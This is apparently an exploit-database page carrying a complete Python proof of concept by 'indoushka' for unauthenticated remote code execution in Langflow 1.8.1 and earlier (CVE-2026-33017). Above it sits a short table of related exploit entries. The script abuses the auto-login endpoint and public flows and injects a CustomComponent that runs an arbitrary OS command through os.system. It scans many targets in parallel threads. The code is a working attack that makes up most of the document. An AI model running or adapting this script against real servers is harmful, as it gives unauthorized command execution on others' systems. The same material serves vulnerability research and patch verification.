| Reporter | Title | Published | Views | Family All 39 |
|---|---|---|---|---|
| githubexploit | Exploit for Command Injection in Paloaltonetworks Pan-Os | 30 Mar 2026 13:39 | – | |
| githubexploit | Exploit for Code Injection in Langflow | 22 May 2026 22:01 | – | |
| githubexploit | Exploit for Code Injection in Langflow | 13 Apr 2026 18:33 | – | |
| githubexploit | Exploit for Code Injection in Langflow | 20 Apr 2026 14:54 | – | |
| githubexploit | Exploit for CVE-2026-33017 | 21 Mar 2026 17:06 | – | |
| githubexploit | Exploit for Eval Injection in Langflow | 27 Mar 2026 07:15 | – | |
| githubexploit | Exploit for Eval Injection in Langflow | 7 Apr 2026 23:54 | – | |
| githubexploit | Exploit for Cross-site Scripting in B3Log Siyuan | 12 May 2026 19:20 | – | |
| githubexploit | Exploit for CVE-2026-33017 | 21 Mar 2026 08:11 | – | |
| githubexploit | Exploit for Code Injection in Langflow | 14 Apr 2026 17:09 | – | |
==================================================================================================================================
| # Title : Langflow 1.8.1 Unauthenticated RCE poc Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.langflow.org/ |
==================================================================================================================================
[+] Summary : This Python script is a multi-threaded tool targeting a suspected vulnerability in Langflow (≤ 1.8.1) that allows unauthenticated remote code execution through the unsafe execution of CustomComponent code during flow compilation.
[+] The tool automates the exploitation workflow by:
- Attempting to obtain an authentication token via an auto-login endpoint, when available.
- Searching for, or creating, a public flow within the target instance.
- Injecting a malicious CustomComponent payload containing Python code that triggers OS command execution.
- Submitting a build request to the vulnerable endpoint and monitoring job execution events.
- Reporting whether the target is vulnerable, based on the build validation results.
- Supporting multi-target scanning with threading, optional cleanup of created flows, and configurable command execution.
Overall, it is designed as an automated scanner to detect and demonstrate the potential RCE impact on vulnerable Langflow deployments.
[+] POC :
#!/usr/bin/env python3
import argparse
import json
import sys
import threading
import uuid
from concurrent.futures import ThreadPoolExecutor, as_completed
import requests
_print_lock = threading.Lock()
def log(target: str, msg: str) -> None:
with _print_lock:
print(f"[{target}] {msg}")
def get_auth_token(base_url: str, timeout: int) -> str | None:
try:
resp = requests.get(f"{base_url}/api/v1/auto_login", timeout=timeout)
if resp.status_code == 200:
return resp.json().get("access_token")
except (requests.RequestException, ValueError):
pass
return None
def find_public_flow(base_url: str, token: str, timeout: int) -> tuple[str | None, str | None]:
try:
resp = requests.get(
f"{base_url}/api/v1/flows/",
headers={"Authorization": f"Bearer {token}"},
timeout=timeout,
)
resp.raise_for_status()
flows = resp.json()
if not isinstance(flows, list):
return None, None
for flow in flows:
if flow.get("access_type") == "PUBLIC":
return flow["id"], flow.get("name", "?")
except (requests.RequestException, ValueError, KeyError):
pass
return None, None
def create_public_flow(base_url: str, token: str, timeout: int) -> str:
headers = {
"Authorization": f"Bearer {token}",
"Content-Type": "application/json",
}
body = {
"name": f"lab-{uuid.uuid4().hex[:8]}",
"data": {"nodes": [], "edges": [], "viewport": {}},
"is_component": False,
"access_type": "PUBLIC",
"description": "CVE-2026-33017 lab flow",
}
resp = requests.post(f"{base_url}/api/v1/flows/", json=body, headers=headers, timeout=timeout)
resp.raise_for_status()
flow = resp.json()
if not isinstance(flow, dict):
raise ValueError(f"invalid response: {flow}")
flow_id = flow.get("id")
if not flow_id:
raise ValueError(f"create_flow: no id in response: {flow}")
if flow.get("access_type") != "PUBLIC":
requests.patch(
f"{base_url}/api/v1/flows/{flow_id}",
json={"access_type": "PUBLIC"},
headers=headers,
timeout=timeout,
).raise_for_status()
return flow_id
def delete_flow(base_url: str, token: str, flow_id: str, timeout: int) -> None:
try:
requests.delete(
f"{base_url}/api/v1/flows/{flow_id}",
headers={"Authorization": f"Bearer {token}"},
timeout=timeout,
)
except requests.RequestException:
pass
def build_exploit_payload(command: str) -> dict:
malicious_code = f"""\
from langflow.custom import Component
from langflow.io import Output
_r = __import__('os').system({repr(command)})
class ExploitComponent(Component):
display_name = "ExploitComponent"
description = "CVE-2026-33017 PoC"
outputs = [Output(display_name="Result", name="output", method="run")]
def run(self) -> str:
return "ok"
"""
node_id = str(uuid.uuid4())
return {
"data": {
"nodes": [
{
"id": node_id,
"type": "genericNode",
"position": {"x": 0, "y": 0},
"data": {
"type": "CustomComponent",
"id": node_id,
"node": {
"template": {
"_type": "CustomComponent",
"code": {
"value": malicious_code,
"type": "code",
"required": True,
"show": True,
"name": "code",
"dynamic": False,
"list": False,
"multiline": True,
},
},
"description": "poc",
"display_name": "ExploitComponent",
"custom_fields": {},
"output_types": ["str"],
"base_classes": ["str"],
"outputs": [
{
"display_name": "Result",
"name": "output",
"method": "run",
"selected": "str",
"types": ["str"],
"value": "__UNDEFINED__",
}
],
},
},
}
],
"edges": [],
"viewport": {"x": 0, "y": 0, "zoom": 1},
}
}
def _poll_job_result(base_url: str, job_id: str, client_id: str, token: str | None, timeout: int) -> bool:
headers = {"Accept": "application/x-ndjson"}
if token:
headers["Authorization"] = f"Bearer {token}"
try:
with requests.get(
f"{base_url}/api/v1/build/{job_id}/events",
headers=headers,
cookies={"client_id": client_id},
stream=True,
timeout=timeout,
) as r:
for raw_line in r.iter_lines():
if not raw_line:
continue
if isinstance(raw_line, bytes):
raw_line = raw_line.decode("utf-8", errors="replace")
try:
evt = json.loads(raw_line)
if evt.get("event") == "end_vertex":
return bool(evt.get("data", {}).get("build_data", {}).get("valid"))
except json.JSONDecodeError:
pass
except requests.RequestException:
pass
return False
def send_exploit(base_url: str, flow_id: str, command: str, token: str | None, timeout: int) -> bool:
payload = build_exploit_payload(command)
client_id = str(uuid.uuid4())
endpoint = f"{base_url}/api/v1/build_public_tmp/{flow_id}/flow"
resp = requests.post(endpoint, json=payload, cookies={"client_id": client_id}, timeout=timeout)
if resp.status_code == 403 and token:
resp = requests.post(
endpoint,
json=payload,
cookies={"client_id": client_id},
headers={"Authorization": f"Bearer {token}"},
timeout=timeout,
)
if resp.status_code not in (200, 201):
return False
try:
data = resp.json()
except ValueError:
return False
job_id = data.get("job_id")
if not job_id:
return False
return _poll_job_result(base_url, job_id, client_id, token, timeout)
def exploit_target(
base_url: str,
cmd: str,
flow_id_arg: str | None,
timeout: int,
no_cleanup: bool,
) -> dict:
def err(detail: str) -> dict:
return {"url": base_url, "status": "ERROR", "detail": detail}
token = get_auth_token(base_url, timeout)
log(base_url, f"auth: {'JWT token obtained' if token else 'no token (scenario B)'}")
flow_id = flow_id_arg
flow_created = False
if flow_id:
log(base_url, f"flow: provided via argument ({flow_id})")
elif token:
flow_id, flow_name = find_public_flow(base_url, token, timeout)
if flow_id:
log(base_url, f"flow: existing public flow — {flow_name} ({flow_id})")
else:
try:
flow_id = create_public_flow(base_url, token, timeout)
flow_created = True
log(base_url, f"flow: created ({flow_id})")
except (requests.RequestException, ValueError) as e:
log(base_url, f"flow: creation failed — {e}")
return err(f"create_flow: {e}")
else:
log(base_url, "no token and no --flow-id provided")
return err("no token and no --flow-id provided")
try:
success = send_exploit(base_url, flow_id, cmd, token, timeout)
except requests.RequestException as e:
log(base_url, f"exploit: network error — {e}")
return err(f"send_exploit: {e}")
finally:
if flow_created and not no_cleanup and token:
delete_flow(base_url, token, flow_id, timeout)
log(base_url, f"flow: deleted ({flow_id})")
if success:
log(base_url, "[+] VULNERABLE — RCE executed")
return {"url": base_url, "status": "VULNERABLE", "detail": ""}
else:
log(base_url, "[-] FAILED — build invalide ou non confirmé")
return {"url": base_url, "status": "FAILED", "detail": "invalid build"}
def main() -> None:
parser = argparse.ArgumentParser(
description="CVE-2026-33017 — Langflow RCE PoC (educational / lab use only)",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=__doc__,
)
parser.add_argument("--url", default=None, help="Single target Langflow URL")
parser.add_argument("--url-file", default=None, help="Text file with one URL per line")
parser.add_argument("--cmd", default="id", help="OS command to execute (default: id)")
parser.add_argument("--flow-id", default=None, help="UUID of an existing public flow (optional)")
parser.add_argument("--threads", type=int, default=5, help="Parallel threads (default: 5)")
parser.add_argument("--timeout", type=int, default=15, help="HTTP timeout in seconds (default: 15)")
parser.add_argument("--no-cleanup", action="store_true", help="Do not delete the created flow after exploitation")
args = parser.parse_args()
targets: list[str] = []
if args.url:
targets.append(args.url.rstrip("/"))
if args.url_file:
try:
with open(args.url_file) as f:
for line in f:
line = line.strip()
if line and not line.startswith("#"):
targets.append(line.rstrip("/"))
except OSError as e:
print(f"[-] Cannot read {args.url_file}: {e}")
sys.exit(1)
if not targets:
parser.error("Provide --url or --url-file")
targets = list(dict.fromkeys(targets))
print(f"\n{'='*60}")
print(f" CVE-2026-33017 — Langflow RCE PoC")
print(f"{'='*60}")
print(f" Targets : {len(targets)}")
print(f" Command : {args.cmd}")
print(f" Threads : {args.threads} | Timeout : {args.timeout}s")
print(f"{'='*60}\n")
results: list[dict] = []
with ThreadPoolExecutor(max_workers=args.threads) as pool:
futures = {
pool.submit(
exploit_target,
url, args.cmd,
args.flow_id, args.timeout, args.no_cleanup,
): url
for url in targets
}
for future in as_completed(futures):
try:
results.append(future.result())
except Exception as e:
results.append({"url": futures[future], "status": "ERROR", "detail": str(e)})
flags = {"VULNERABLE": "[+]", "FAILED": "[-]", "ERROR": "[!]"}
col = max(len(r["url"]) for r in results)
print(f"\n{'='*60}")
print(f" SUMMARY")
print(f"{'='*60}")
for r in sorted(results, key=lambda x: x["status"]):
flag = flags.get(r["status"], "[ ]")
detail = f" {r['detail']}" if r["detail"] else ""
print(f" {flag} {r['url']:<{col}} {r['status']}{detail}")
print(f"{'='*60}")
vuln_count = sum(1 for r in results if r["status"] == "VULNERABLE")
print(f"\n {vuln_count}/{len(results)} target(s) vulnerable\n")
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation